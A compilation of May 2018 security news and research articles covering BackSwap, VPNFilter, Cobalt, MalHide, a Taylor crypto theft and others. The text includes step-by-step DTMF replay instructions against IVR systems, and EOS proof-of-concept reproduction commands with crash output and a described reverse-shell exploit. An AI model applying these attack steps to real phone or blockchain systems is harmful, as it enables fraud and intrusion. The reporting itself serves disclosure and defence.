ESET has been tracking the actor behind this Trojan since January 2018, when they were employing clipboard malware. The hackers started using BackSwap only in March but focused heavily on its development, releasing new versions almost daily.

To distribute the malware, the actor uses malicious emails carrying a heavily obfuscated JavaScript downloader known as Nemucod. Mainly targeting Polish users, BackSwap was often found on machines also infected with Nymaim, but a strong connection between the two malware families is yet unclear.

BackSwap is delivered as modified versions of legitimate apps, with the malicious code being launched during initialization and the original code never used again, meaning that the application doesn’t work at all (as would be the case with Trojanized software).

This shows a focus on increasing stealth instead of tricking the user into believing they are running the legitimate app and also makes the malware more difficult to spot. The Trojan immediately copies itself into the startup folder to ensure persistence, and then proceeds with its nefarious functionality.

Unlike typical banking malware that injects itself into the browser’s process address space, then hooks browser-specific functions to start modifying traffic, BackSwap only works with Windows GUI elements and simulates user input.

The malware installs event hooks for a specific range of events to monitor the visited URL. It then looks for bank-specific URLs and window titles in the browser to determine when the victim is getting ready to make a wire transfer. Finally, it loads the malicious JavaScript appropriate for the corresponding bank from its resources and injects it into the browser.

Older variants injected the malicious script into the clipboard, simulate opening the developer’s console to pasting the clipboard content there, execute the content of the console, and then close the console. Now, the script is executed directly from the address bar, via JavaScript protocol URLs.

The malware can target Chrome, Firefox, and Internet Explorer (in most recent versions), but the method should work on most browsers today, as long as they have a JavaScript console available or support execution of JavaScript from the address bar, ESET reveals.

A specific script is used for each targeted bank and injected into pages the malware identifies as initiating a wire transfer request. The script replaces the recipient’s bank account number with a different one, which results in money being sent to the attacker’s account instead.

“Any safeguards against unauthorized payment, such as 2-factor authorization, won’t help in this case, as the account owner is willingly sending the wire transfer,” ESET explains.

BackSwap has targeted five Polish banks in the past (PKO Bank Polski, Bank Zachodni WBK S.A., mBank, ING and Pekao), but recent variants only target three (PKO BP, mBank and ING).

Older versions relied on command and control (C&C) servers hosted on hacked WordPress websites to retrieve the fraudulent bank account numbers, but recent variants store these account numbers directly in the malicious scripts (the account numbers change often, the researchers say).

The Trojan only steals money if the wire transfer amount is in the 10,000 - 20,000 PLN range (around $2,800 – $5,600) USD.


Abusing Interactive Voice Response systems – Legacy Telecom [CVE-2018-11518]
29.5.2018 securityaffairs
Vulnerebility

A vulnerability tracked as CVE-2018-11518 could be exploited by attackers to power a phreaking attack on HCL legacy Interactive Voice Response systems that do not use VoIP.
These IVR systems rely on various frequencies of audio signals; based on the frequency, certain commands and functions are processed. Since these frequencies are accepted within a phone call, an attacker can record these frequencies and use them to
activate services or to get sensitive information.

Summary: Dual-tone multi-frequency signaling (DTMF) is a voice-frequency used in
Interactive Voice Response systems (IVRs).

Interactive Voice Response systems

For each key pressed, a dial tone is created by combining the frequencies of the
corresponding numbers row and column. For example, the dial tone of “5” is created by
combining the frequency of “770Hz” and “1336 Hz” and the resultant is the frequency
of “5”.
Abstract: The attack is a phreak attack on IVR systems which are yet to be completely
made VOIP. These Interactive Voice Response systems work on frequency and based on the frequency certain commands and functions are processed. Since these frequencies are generated by the phone, these frequencies are recorded and used to activate services or to get sensitive information for one or multiple users at the same time.

Steps to reproduce attack:

First of all you need a recording of the IVR frequencies. This is nothing but the
different frequency that for each number that is taken by IVR to process it. Once
we have the frequencies recorded as mp3, m4a or any other format let’s begin.
Call any toll free number (possibly 198 in India) using any telecom operator SIM.
Dial the toll free number according to your country and operator.
You will hear the recoded voice saying something like “Press 1 for English, 2 for
Hindi,” this is the time you have to play your recorded frequency. Suppose you
want to select English, play the frequency for dial tone 1 from another device or
laptop or through speakers. The IVR will take this as input and process it and
make your language as English.
Possible attack scenarios: In the attack scenarios described above we only used
frequencies that of dial tone from 0-9, it is possible to disrupt the systems, control any
users IVR input and subscribe for services, change settings, extract information and
can also cause a denial of service.
CVE-2018-11518 is been assigned to HCL legacy IVR systems, however our research
says IVR belonging to the vendors such as IBM, COMVIVA, SPICEDIGITAL might be
vulnerable to such attacks.


The Cobalt Hacking crew is still active even after the arrest of its leader
29.5.2018 securityaffairs Hacking

Group-IB has released a new report on Cobalt group’s attacks against banks and financial sector organizations worldwide after the arrest of its leader.
Threat intelligence firm Group-IB published an interesting report titiled “Cobalt: Evolution and Joint Operations” on the joint operations of Cobalt and Anunak (Carbanak) groups after the arrest of the leader in March 2018.

Researchers reported that the most recent campaign associated with Cobalt group is dated May 23, 2018 and aimed at banks in Russia and CIS countries.

The analysis of the content of the spear phishing messages suggest attackers are also targeting western financial organizations.

Interestingly, the spear-phishing messages sent by the hackers were disguised as fake Kaspersky security alerts.

“The first wave of the phishing campaign was tracked on May 23 at 13:21 Moscow time. For the first time in Cobalt’s practice, phishing emails were sent acting as a major anti-virus vendor.” reads the press release issued by Group-IB.

“The user received a “complaint” in English that activity was recorded from their computer that violated existing legislation. The recipient was asked to read the attached letter and provide detailed explanations. If the response was not received within 48 hours, the “anti-virus company” threatened to impose sanctions on the recipient’s web resources. In order to download the letter, the user was asked to follow the link, which would then infect the Bank employee’s computer.”

Cobalt attack

Group-IB attributed the attack to Cobalt due to the involvement of Coblnt Trojan, a malware exclusively observed in campaigns of the threat actor.

The phishing emails were sent the domain “kaspersky-corporate.comthat was registered by the same person that registered other domains used by the Cobalt group for its campaigns.

Experts highlighted the high quality of phishing messages, the text in perfect English and it is stylized as a “legal complaint”, while the fake website kaspersky-corporate.com also has a high level of quality. This quality suggests a possible collaboration of Cobalt with other criminal gangs like Anunak.

The report also analyzed past the attacks aimed at SWIFT system, researchers concluded that the advanced understanding of banking technology and money laundering capabilities was the result of a collaboration with other threat actors.

“Following the 2016 SWIFT incidents, attacks involving interbank transfer systems ceased and Cobalt switched focus to other critical systems in banks such as ATMs. This was followed by Card Processing attacks which provide a safer withdraw process for Money Mules.” continues the report.

“Cobalt’s first major attack was against First Bank in Taiwan where attackers managed to steal over $2 million dollars. Following this, Cobalt was then successful in targeting the card processing systems at a bank in Kazakhstan taking over two months to prepare their attack and successfully steal $600,000 through card processing. These attacks were then perfected and intensified in 2017 across tens of incidents.”

The Cobalt group has also conducted ‘supply chain’ attacks like the one powered in February 2017 against a system integrator to later hit organizations in Russia and former CIS countries. In 2017 Cobalt infiltrated at least other four system integrators.

Cobalt’s attacks also hit non-typical targets like the one that in March 2017 hit a company providing electronic wallets and payment terminals.

Cobalt group always modified its tools across the years, it also used a modified version of Petya Ransomware to erase evidence of the attack after a failed attempt to steal from their ATM systems.

“Cobalt is still active: its members continue attacks on financial organizations and other companies worldwide,” comments Dmitry Volkov, Group-IB CTO. “We have technical proof of collaboration between Cobalt and Carbanak. In order to enable business and market regulators to take preventative measures against these criminals, we provide our customers indicators to protect them from phishing, identify the infrastructure and methods still used by these criminals.”


Hacker stole $1.35 million from cryptocurrency startup Taylor
29.5.2018 securityaffairs Cryptocurrency

Hacker stole $1.3 million from cryptocurrency startup Taylor, the development team will stop the launch of its trading app that was initially planned for this month.
The author of the Taylor cryptocurrency trading app announced a security breach, an unknown hacker has stolen around $1.35 million worth of Ether from the wallets of the company.

The funds were collected by the company through an initial coin offering (ICO) round.

The attack occurred on May 22. the company is still investigating the incident but it believes the culprit is the same hacker that supposedly hacked CypheriumChain stealing more than 17,000 ETH.

According to the experts, the hacker stole funds from multiple companies and moved them in a wallet used as an aggregator, then transferred them to the same wallet (0x94f20ccff70d82d1579d8B11f2985F8dE9B287Cf) involved in the CypheriumChain hack in March .

“Today we arrived at the office and found out that we’ve been hacked and all of our funds have been stolen. Not only the balance in ETH (2,578.98 ETH), but also the TAY tokens from the Team and Bounty pools (more than 7% of the total supply). The only tokens that were not stolen are the ones from the Founders’ and Advisors’ pools, because there’s a vesting contract making them inaccessible for now.” reads the announcement published by the company on Medium.

“We are still investigating, but, as far as we know, the hacker is same person/group that supposedly hacked CypheriumChain (more than 17,000 ETH were stolen). “

The hacker was able to access one of the company devices and then gained the access to one of the 1Password files, the company excluded that attackers used a smart contract exploit.

The only tokens that were not stolen by the attacker are those belonging to the Founders’ and Advisors’ pool because they were held in an inaccessible vesting contract.

The company believes the TAY tokens could be soon exchanged for other cryptocurrencies, for this reason, asked the IDEX platform to temporary suspend the trade the TAY tokens to block the hacker. Such kind of countermeasure could have a dramatic effect on legitimate TAY token owners that will not able to trade their tokens.

Due to the hack, the Taylor team will stop the launch of its trading app that was initially planned for this month.

Someone is speculating this could be an exit scam.


EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds
29.5.2018 securityaffairs
Vulnerebility

Security experts from the 360 Core Security Team have found and successfully exploited a buffer out-of-bounds write vulnerability in EOS node when parsing a WASM file.
Vulnerability Description
We found and successfully exploit a buffer out-of-bounds write vulnerability in EOS when parsing a WASM file.

To use this vulnerability, attacker could upload a malicious smart contract to the nodes server, after the contract get parsed by nodes server, the malicious payload could execute on the server and take control of it.

After taken control of the nodes server, attacker could then pack the malicious contract into the new block and further control all nodes of the EOS network.

Vulnerability Reporting Timeline
2018-5-11 EOS Out-of-bound Write Vulnerability Found

2018-5-28 Full Exploit Demo of Compromise EOS Super Node Completed

2018-5-28 Vulnerability Details Reported to Vendor

2018-5-29 Vendor Fixed the Vulnerability on Github and Closed the Issue

2018-5-29 Notices the Vendor the Fixing is not complete

Some Telegram chats with Daniel Larimer:

We trying to report the bug to him.

He said they will not ship the EOS without fixing, and ask us to send the report privately since some people are running public test nets

EOS

He provided his mailbox and we send the report to him

EOSEOS 3

EOS fixed the vulnerability and Daniel would give the acknowledgment.

EOS 4

Technical Detail of the Vulnerability
This is a buffer out-of-bounds write vulnerability

At libraries/chain/webassembly/binaryen.cpp (Line 78),Function binaryen_runtime::instantiate_module:

for (auto& segment : module->table.segments) {
Address offset = ConstantExpressionRunner<TrivialGlobalManager>(globals).visit(segment.offset).value.geti32();
assert(offset + segment.data.size() <= module->table.initial);
for (size_t i = 0; i != segment.data.size(); ++i) {
table[offset + i] = segment.data[i]; <= OOB write here !
}
}

Here table is a std::vector contains the Names in the function table. When storing elements into the table, the |offset| filed is not correctly checked. Note there is an assert before setting the value, which checks the offset, however, unfortunately, |assert| only works in Debug build and does not work in a Release build.

The table is initialized earlier in the statement:

table.resize(module->table.initial);

Here |module->table.initial| is read from the function table declaration section in the WASM file and the valid value for this field is 0 ~ 1024.

The |offset| filed is also read from the WASM file, in the data section, it is a signed 32-bits value.

So basically with this vulnerability, we can write to a fairly wide range after the table vector’s memory.

How to reproduce the vulnerability
Build the release version of latest EOS code
./eosio-build.sh

Start EOS node, finish all the necessary settings described at:
https://github.com/EOSIO/eos/wiki/Tutorial-Getting-Started-With-Contracts

Set a vulnerable contract:
We have provided a proof of concept WASM to demonstrate a crash.

In our PoC, we simply set the |offset| field to 0xffffffff so it can crash immediately when the out of bound write occurs.

To test the PoC:
cd poc
cleos set contract eosio ../poc -p eosio

If everything is OK, you will see nodes process gets a segment fault.

The crash info:

(gdb) c

Continuing.

Program received signal SIGSEGV, Segmentation fault.

0x0000000000a32f7c in eosio::chain::webassembly::binaryen::binaryen_runtime::instantiate_module(char const*, unsigned long, std::vector<unsigned char, std::allocator<unsigned char> >) ()

(gdb) x/i $pc

=> 0xa32f7c <_ZN5eosio5chain11webassembly8binaryen16binaryen_runtime18instantiate_moduleEPKcmSt6vectorIhSaIhEE+2972>: mov %rcx,(%rdx,%rax,1)

(gdb) p $rdx

$1 = 59699184

(gdb) p $rax

$2 = 34359738360

Here |rdx| points to the start of the |table| vector,

And |rax| is 0x7FFFFFFF8, which holds the value of |offset| * 8.
Exploit the vulnerability to achieve Remote Code Execution
This vulnerability could be leveraged to achieve remote code execution in the nodeos process, by uploading malicious contracts to the victim node and letting the node parse the malicious contract. In a real attack, the attacker may publish a malicious contract to the EOS main network.

The malicious contract is first parsed by the EOS supernode, then the vulnerability was triggered and the attacker controls the EOS super node which parsed the contract.

The attacker can steal the private key of super nodes or control content of new blocks. What’s more, attackers can pack the malicious contract into a new block and publish it. As a result, all the full nodes in the entire network will be controlled by the attacker.

We have finished a proof-of-concept exploit, and tested on the nodeos build on 64-bits Ubuntu system. The exploit works like this:

The attacker uploads malicious contracts to the nodeos server.
The server nodeos process parses the malicious contracts, which triggers the vulnerability.
With the out of bound write primitive, we can overwrite the WASM memory buffer of a WASM module instance. And with the help of our malicious WASM code, we finally achieve arbitrary memory read/write in the nodeos process and bypass the common exploit mitigation techniques such as DEP/ASLR on 64-bits OS.
Once successfully exploited, the exploit starts a reverse shell and connects back to the attacker.
You can refer to the video we provided to get some idea about what the exploit looks like, We may provide the full exploit chain later.
The Fixing of Vulnerability
Bytemaster on EOS’s github opened issue 3498 for the vulnerability that we reported:

And fixed the related code

But as the comment made by Yuki on the commit, the fixing still has problems on 32-bits process and not so perfect.

The 360 Core Security Team credited Yuki Chen of Qihoo 360 Vulcan Team and Zhiniang Peng of Qihoo 360 Core Security for the discovery of the vulnerability.


Russia Asks Apple to Help Block Telegram
28.5.2018 securityweek BigBrothers 

Russia's communications watchdog said Monday it had requested Apple help it block the popular messaging app Telegram which has been banned in the country for refusing to give the security services access to private conversations.

Roskomnadzor said it had requested that Apple both block push notifications for Telegram users in Russia, which would mean users would not receive alerts for new messages and thus render it less useful, as well as no longer make it available for download in the country.

"In order to avoid possible action by Roskomnadzor for violations of the functioning of the above-mentioned Apple Inc. service, we ask you to inform us as soon as possible about your company's further actions to resolve the problematic issue," said the regulator.

Roskomnadzor's director Alexander Zharov later told the Russian news agency Interfax that Apple had one month to reply and declined to speculate about what actions it could possibly take against the US firm if it refused to comply.

Last month a Moscow court banned the popular app following a long-running battle between authorities and Telegram, which has a reputation for securely encrypted communications, as Moscow pushes to increase surveillance of internet activities.

The app was created by maverick Russian programmer Pavel Durov, who has long said he will reject any attempt by the country's security services to gain backdoor access to the app.

The free app that lets people exchange messages, stickers, photos and videos in groups of up to 5,000 people has attracted more than 200 million users since its launch by Durov and his brother Nikolai in 2013.

Following the court ruling Roskomnadzor has moved to block the functioning of Telegram, but has acknowledged it has only succeeded in disrupting its operations by 15 to 30 percent.

It has also ended up disrupting other services, with Zharov last week accusing Telegram of using other online services as "human shields" by using their servers.

Zharov was also quoted by Russian news agencies as saying the ban against Telegram was justified as it had been used in the planning of all the latest terror attacks around the world.

Roskomnadzor told the TASS state news agency on Monday that discussions were still underway with Google about implementing the ban.


FBI Attribution of 'VPNFilter' Attack Raises Questions
28.5.2018 securityweek  
Virus

Information shared by the FBI on the massive VPNFilter attack in which more than half a million devices have been compromised raises some interesting questions about the connection between Russia-linked hacker groups.

The existence of VPNFilter was brought to light last week by Cisco Talos and several other cybersecurity firms. The botnet is powered by at least 500,000 hacked routers and network-attached storage (NAS) devices across 54 countries.

The malware can intercept data passing through the compromised device, it can monitor the network for communications over the Modbus SCADA protocol, and also has destructive capabilities that can be leveraged to make an infected device unusable.

Many of the hijacked devices are located in Ukraine and a separate command and control (C&C) infrastructure has been set up for devices in this country. Researchers also spotted code similarities to the BlackEnergy malware and pointed out that there are only a few weeks until Ukraine celebrates its Constitution Day, which last year coincided with the destructive NotPetya attack. All this has led experts to believe that VPNFilter may mean Russia is preparing for a new attack on Ukraine.VPNFilter

Shortly after security firms published technical details on the attack, the U.S. Department of Justice announced that the FBI had seized toknowall.com, one of the C&C domains utilized by VPNFilter.

A press release and court documents name the Russia-linked threat actor Sofacy as being behind the attack. While this is not surprising, one noteworthy piece of information is that U.S. authorities say Sofacy is also known as APT28, Pawn Storm, Fancy Bear, Sednit, X-Agent, and Sandworm.

Sandworm, also tracked by some security companies as TeleBots, is a threat actor known to use the BlackEnergy malware in attacks aimed at industrial systems and it’s believed to be responsible for the 2015 power outage in Ukraine. However, Sandworm was until now seen as a separate group from Sofacy.

SecurityWeek has reached out to the Justice Department and the FBI for clarifications, but the organizations say they “do not have a comment outside what is included in the DOJ press release.”

Industry professionals, however, have offered some possible explanations as to why the FBI may see Sofacy and Sandworm as the same group.

“Sandworm is a similar team whose interests overlap with APT 28. We believe these actors are related and act accordingly,” Craig Williams, director of outreach with Cisco Talos, told SecurityWeek.

Vikram Thakur, principal research manager at Symantec Security Response, noted, “The intelligence community has the best shot at attributing attacks to individuals and organizations. Every security vendor groups attackers based on their own vantage into the attack landscape.

“Keeping in mind that attack groups themselves share knowledge, expertise, and resources, we don’t have any reason to question the grouping of Sofacy, Sandworm, X-Agent, and others that the FBI listed in their affidavit to seize a domain related to VPNFilter.”

Researchers at Kaspersky also found it curious that the FBI suggested Sandworm and Sofacy were one and the same.

“This would suggest that Sandworm, also known as BlackEnergy APT, is regarded as subgroup of Sofacy by the FBI,” Kaspersky researchers said. “Most threat intel companies have held these groups separate before, although their activity is known to have overlapped in several cases.”

Advice from the FBI and targeted device vendors

Rebooting a router is typically enough to remove a piece of malware from the device. However, VPNFilter has some clever persistence mechanisms that help its stage 1 component survive a reboot.

An alert issued on Friday by the FBI advises owners of small office and home office routers to reboot their devices to “temporarily disrupt the malware and aid the potential identification of infected devices.”

“Owners are advised to consider disabling remote management settings on devices and secure with strong passwords and encryption when enabled. Network devices should be upgraded to the latest available versions of firmware,” the FBI said.

The VPNFilter malware has been observed targeting devices from Linksys, MikroTik, Netgear, TP-Link and QNAP. All of these vendors have published advisories to warn their customers about the threat.

There is no evidence that the malware exploits any zero-day vulnerabilities to hack devices. Affected vendors noted that the flaws targeted by VPNFilter have already been patched and advised customers to update the firmware on their devices.


Researchers And The FBI Work Together to Take Down the Russian VPNFilter Botnet Targeting Home Routers
28.5.2018 securityaffairs
Virus

Researchers and the FBI are working together to take down the dreaded VPNFilter botnet composed of hundreds of thousands of compromised devices.
For several months, there have been rumors and vague warnings about highly skilled adversaries targeting critical infrastructure. Last week we learned some details about the warning, why you might be impacted and how the FBI is helping victims recover.
On May 23rd, Cisco’s security research arm Talos, released details about a “sophisticated modular malware system” they call VPNFilter.

The malware successfully infected over 500,000 routers manufactured by Linksys, MikroTik, NETGEAR, and TP-Link as well as QNAP brand network storage devices. It appears the malware was targetted at victims in Ukraine, but the ubiquity of the Internet often means these attacks spread to a wider group of victims and infections have been found in over 54 countries.

Following the Talos release, the FBI announced it had taken control of the Command & Control (C&C) server for the botnet, effectively neutering the botnet.

We have seen similar compromises of small to medium business (SMB) equipment in the past (Mirai) where known vulnerabilities were exploited to gain control of Internet of Things (IoT) devices accessible from the Internet.

Researchers have yet to determine the specific method of compromise in this case, but knowing this equipment is often poorly maintained in homes and small business there is a strong likelihood that they were vulnerable to a range of exploits. Despite some similarities to previous IoT attacks, VPNFilter has some unique capabilities that show how this type of malware is evolving.

IoT devices have limited computing resources so malware is normally “memory resident” meaning you can remove the infection simply by rebooting your device. VPNFilter is successful at persisting the first stage of its infection through reboots.

This means that upon reboot, the malware can connect to the C&C server and download the configured modules to reinfect the device. At the time of the announcement several different modules had been identified which could have devastating implications for impacted businesses.

VPNFilter
From the Talos report, “The stage 2 malware, which does not persist through a reboot, possesses capabilities that we have come to expect in a workhorse intelligence-collection platform, such as file collection, command execution, data exfiltration and device management.”

In addition, it appears the bad actors had the ability to brick the devices remotely, rendering them useless and denying Internet access to the companies and homes relying on them. They also identified packet sniffing capabilities which would identify usernames and passwords — which is pretty common — but also decoding Modbus SCADA traffic which is used by companies to remotely control equipment in manufacturing, pipelines, and energy.

Based upon the apparent Ukraine focus and the targetting of SCADA protocols, The Daily Beast reports VPNFilter is “linked to the same Russian hacking group, known Fancy Bear, that breached the Democratic National Committee and the Hillary Clinton campaign during the 2016 election.”

What can you do?

Since the FBI is in control of the C&C servers rebooting your equipment should remove the malicious modules, but the Stage 1 infection will still be resident. If you have equipment from the identified manufacturers, you should perform a factory reset.

This will remove all of the bad code, but unfortunately also removes all of your settings — so it is impactful. Researchers are still uncovering the extent of the compromise, so it isn’t a bad idea to reboot your edge devices even if they come from a different manufacturer in the SMB space.

Additional advice is the good practice everyone should be following regardless of who manufactured your equipment: change default passwords, disable remote administration from the Internet and install any available updates from your manufacturer.


Hackers defaced screens at Mashhad airport in Iran protesting the government
28.5.2018 securityaffairs Hacking

On Thursday 24th May, hackers defaced the screens at the Mashhad airport in Iran to protest ùthe Government and the military’s activities in the Middle East.
On Thursday 24th May, hackers defaced the screens at the airport in Mashhad city in Iran. The anonymous group of hackers defaced the screens that were displaying anti-government messages, they also protest the military’s activities in the Middle East.

“Social media reports from Mashhad posted pictures of defaced arrival and departure monitors at the city’s airport showing a statement protesting against Iran’s military presence in the Middle East.” reads a blog post published by Radio Farda.

“Hackers protested to “wasting Iranians lives and financial resources in Gaza, Lebanon and Syria by the Islamic Revolution Guards Corps (IRGC),” according to a statement on the boards.”

The messages were in the Persian language, the hackers accuse the Iranian government of wasting Iranian lives and resources in Lebanon, Syria, and Gaza.

“Wasting Iranians lives and financial resources in Gaza, Lebanon, and Syria by the Islamic Revolution Guards Corps (IRGC),” said the deface message appeared on the screens at the airport.

Hackers defaced screens at Mashhad airport in Iran protesting against the government

According to Radio Farda, a group named Tapandegan (Palpitaters) expressed support for the people of the city of Kazeroon in Fars Province that have been demonstrating against the government for months.

The group of hackers also took control of the email account of the Mashhad airport civil aviation head, Mohsen Eidizadeh and used it to spread the news of the hack.

The hackers also asked people at the airport to share pictures of defaced screens and post them on social media platforms using the hashtag “#Protests_alloverthecountry, #اعتراضات_سراسری” as result, hundreds of Iranians posted the images on Twitter.

View image on TwitterView image on TwitterView image on Twitter

M. Hanif Jazayeri
@HanifJazayeri
Hackers take control of monitors at Iran's Mashhad Airport displaying signs in support of #IranProtests. The signs reads "How much longer?" and carry the Farsi hashtag calling for nationwide protests. #اعتراضات_سراسری#FreeIran2018 #IranRegimeChange (May 24, 2018)

12:36 PM - May 25, 2018
488
396 people are talking about this
Twitter Ads info and privacy
Since December 2017, the city of Mashhad is the theatre of heated protests against the government and the unsustainable prices in the country.

The massive anti-government demonstrations later spread to over 100 other Iranian cities.


MalHide Malware uses the compromised system as an eMail relay
28.5.2018 securityaffairs
Virus

The cybersecurity experts Marco Ramilli analyzed a new sample of malware dubbed MalHide that implements a quite new attack path to use the compromised system as eMail relay in order to hide the attacker networks.
Today I’d like to share an interesting (at least to me) analysis on a given sample. I have called this sample MalHide but you will see “why” only at the end of my post :D. I believe this is a quite interesting Malware because it firstly implements several obfuscation stages by using different obfuscation techniques and secondly it implements a quite new attack path (not new per-se but new on opportunistic malware families) where the attacker doesn’t want to steal information and/or compromise a system for possession and/or destruction but the attacker uses the compromised system as eMail relay in order to hide the attacker networks. It is amazing to figure out that attackers are primary moving on fraud direction. For example, having a successful privilege access on the victim machine, the attacker might decide to perform several malicious actions, but among all the choices, he decides to spawn an SMTP relay to send anonymously fraud emails. Based on my past experience this is quite wired, isn’t it ?!
Disclaimer: I’m not going into details on every step since I’m not writing a tutorial but mostly I’d like to prove that threats are getting more and more complex on relatively short time and that attack path is quite unique at least for my personal experience.
Everything started with an email attachment. “Nuovo Documento.doc” is its name and it is able to bypass every single AntiSpam and AntiMalware engine the target had. The following image shows the initial stage where the “.DOC” file seems to be benign but not compatible with the running Microsoft Word instance.

MalHide Sample as it looks like on opening.
The sample presents some macro functions on it. Many junk functions have been injected on the VBA side in order to make life harder to reverse engineers, but fortunately, the great Microsoft VBA Editor included in the Microsoft Office suite implements a useful debugger. The analyst observes that the AutoOpen() function is preserved and filled by code. It took almost 3 seconds to figure out it was a malicious code. The following image shows the Microsoft VBA Editor debugging view where is possible to appreciate the variable qZbTUw containing a PowerShell encoded code. Here we are! The second stage is approaching the victim.

Stage 2. A running instance of PowerShell invoked by VBA
The PowerShell code was Base64 Encoded and additionally obfuscated through “variable mess”. This technique is quite common for javascript devs since the code they develop runs on client side and obfuscating code is used technique to protect (sort of) the written code, but on the given scenario it looks like a simple implementation of FileLess Staging, where the attacker runs a PowerShell script directly from memory without saving it on HD, in such a way the victim does not need to enable the “running PowerShell from file” Microsoft register key and it’s much harder from AntiVirus detect the infection stage. Then the script fires it on following the infection. Powershell ISE helps us to reverse the dropped payload. The following images show the decoding process: from the single line of obfuscated code to dropping URLs. I know, it’s almost impossible to see the images since they look like small, but please click on them to make a bigger view, if you wish.

Stage 3. Decoding Powershell Drop-and-Execute

Stage 3. Decoded Powershell Drop-and-Execute
The analyst is now able to identify the dropping websites and block them (please refer to IoC section)! The executed actions are quite standard. From an array of dropping website lets cycle over them and take the one who drops! The cycling policy could differ from sample to sample since they could use a pseudo-random seed generator or adopting an increment rotation or a round robin rotation and son. For this analysis is not interesting cycling policy at all since we decoded all the possible dropping files. The Powershell command gets the 52887.exe from an external source (dropping websites) and places it on C:\Users\Public\52887.exe. Finally, it runs it. Stage 4 has began, a new PE sample has been executed. The following image shows the Stage 4 dropping another stage into C:\Windows\SysWOW64\fonduewwa.exe. Fortunately, this stage drops the code from itself without getting on the network side. The fonduewwa.exe is then executed.

Stage 4. 52887.exe dropping to C:\Windows\SysWOW64\fonduewwa.exe
The new stage (Stage 4) performs the following steps:
1) It fires up services which act as SMTP client.
2) Connects to a Command and Control which provides emails addresses, SMTP relays, and eMails body to be sent.
3) Sends eMail to exploit BeC communications.
The following images show the Command and Control address. The first image shows the used Windows API while the second one addresses the opened connections directly on the infected machine.

Command and Control IP Address (click to make it bigger)

Command and Control DNS resolution (click to make it bigger)
The Command and Control (c2) listen to: c-67-176-238-209.hsd1.il.comcast.net which today resolves in: 67.176.238.209. The C2 seems to answers to http queries having a specific set of cookies as the following image shows. The C2 crafted and rebuilt communication, made possible by reconstructing cookies from sniffed internal communications, gets back from C2 a kB of encoded data.

Command and Control Communication through HTTP
From C2 comes actions, victims addresses, SMTP servers, and passwords. The sample connects to a given SMTP relays, it authenticates itself and sends email to the victims. The following images prove that the attackers have plenty of credentials to SMTP relays around the globe.

MalHide Connection to real SMTP relays
As now I will not disclose Username e Password for getting access to SMTP relays, but if you can prove to be the owner (or at least to be working for the company owning) of one of them let’s have a chat on that, many interesting things are happening into your network. The emails sent from the analyzed sample are targeting specific victims. It was pretty easy to figure out that we were facing a new attack vector! This attack vector looks like a BeC (or CEO Scam) to specific targets. For those of you not familiar with this attack I am copying the definition provided by SANS (here).
“Cyber criminals have developed a new attack called CEO Fraud, also known as Business Email Compromise (BEC). In these attacks, a cyber criminal pretends to be a CEO or other senior executive from your organization. The criminals send an email to staff members like yourself that try to trick you into doing something you should not do. These types of attacks are extremely effective because the cyber criminals do their research. They search your organization’s website for information, such as where it is located, who your executives are, and other organizations you work with. The cyber criminals then learn everything they can about your coworkers on sites like LinkedIn, Facebook, or Twitter. Once they know your organization’s structure, they begin to research and target specific employees. They pick their targets based on their specific goals. If the cyber criminals are looking for money, they may target staff in the accounts payable department. If they are looking for tax information, they may target human resources. If they want access to database servers, they could target someone in IT.Once they determine what they want and whom they will target, they begin crafting their attack. Most often, they use spear phishing. Phishing is when an attacker sends an email to millions of people with the goal of tricking them into doing something, for example, opening an infected attachment or visiting a malicious website. Spear phishing is similar to phishing; however, instead of sending a generic email to millions of people, they send a custom email targeting a very small, select number of people. These spear phishing emails are extremely realistic looking and hard to detect. They often appear to come from someone you know or work with, such as a fellow employee or perhaps even your boss. The emails may use the same jargon your coworkers use; they may use your organization’s logo or even the official signature of an executive. These emails often create a tremendous sense of urgency, demanding you take immediate action and not tell anyone.”
Following few examples of the sent emails coming from C2 and delivering through the analyzed MalHide sample.

Here we are, another email has been sent, another Malware has been thought and developed, another analysis I’ve been made but this time it looks like the “Malware economy” is seriously moving to fraud, there is much money respect to information stealing which is an ancient and romantic way to attack victims. Is this attack a significative example expressing the will of the new underground economy? Is this attack a small and silent change of paradigm, where previously the attacker was interested in your data in order to sell them but now he gets more interested on fraud third parties (such as companies) through you? I do not have such answer here.

Ok, now it’s time to explain why I called this Malware MalHide. Well, it’s a complex Malware, it hides several times BUT most important it has been developed to hide the attacker from sending emails in a way that is not possible to trace back the Attacker IP from the attack path. So I believe MalHide would be a nice name 😀

Further details on the MalHide malware, including the IoCs are reported in the original analysis published by Marco Ramilli

https://marcoramilli.blogspot.it/2018/05/malhide-interesting-malware-sample.html


BackSwap Trojan implements new techniques to steal funds from your bank account
28.5.2018 securityaffairs
Virus

Security experts at ESET have spotted a new strain of banking trojan named BackSwap Trojan that implements new techniques to steal money from bank customers.
The new techniques allow the malware to bypass anti-malware solutions and security features implemented by browsers to prevent Man-In-The-Browser attacks.

Banking malware use to inject malicious code into the web page, either via the browser’s JavaScript console or directly into the address bar when the user access to the bank account. Injection mechanisms are the most popular techniques used by popular banking malware, including Dridex, Ursnif, Zbot, Trickbot, and Qbot.

Unfortunately for crooks, modern anti-malware are able to detect process injection activity and neutralize it, for this reason, cybercriminals are focusing their activities on more profitable malware such as ransomware and cryptocurrency miners.

The BackSwap Trojan overwhelms these obstacles using three completely new techniques that don’t tamper with the browser processes.

The first technique implemented by BackSwap allows the Trojan to detect when the user is accessing online banking services, the malicious code leverages a native Windows mechanism named the “message loop.”

“We have discovered a new banking malware family that uses an innovative technique to manipulate the browser: instead of using complex process injection methods to monitor browsing activity, the malware hooks key window message loop events in order to inspect values of the window objects for banking activity.” reads the analysis published by ESET.

“The malware monitors the URL currently being visited by installing event hooks for a specific range of relevant events available through the Windows message loop, such as EVENT_OBJECT_FOCUS, EVENT_OBJECT_SELECTION, EVENT_OBJECT_NAMECHANGE and a few others. The hook will look for URL patterns by searching the objects for strings starting with “https” retrieved by calling the get_accValue method from the event’s IAccessible interface.”

BackSwap simply taps into the Windows message loop searching for URL-like patterns, such as “https” strings and any other terms that are associated with bank’s website.

When the malware detects the browser is accessing the website of a bank it simulates key presses to perform the injection of the JavaScript appropriate for the corresponding bank.

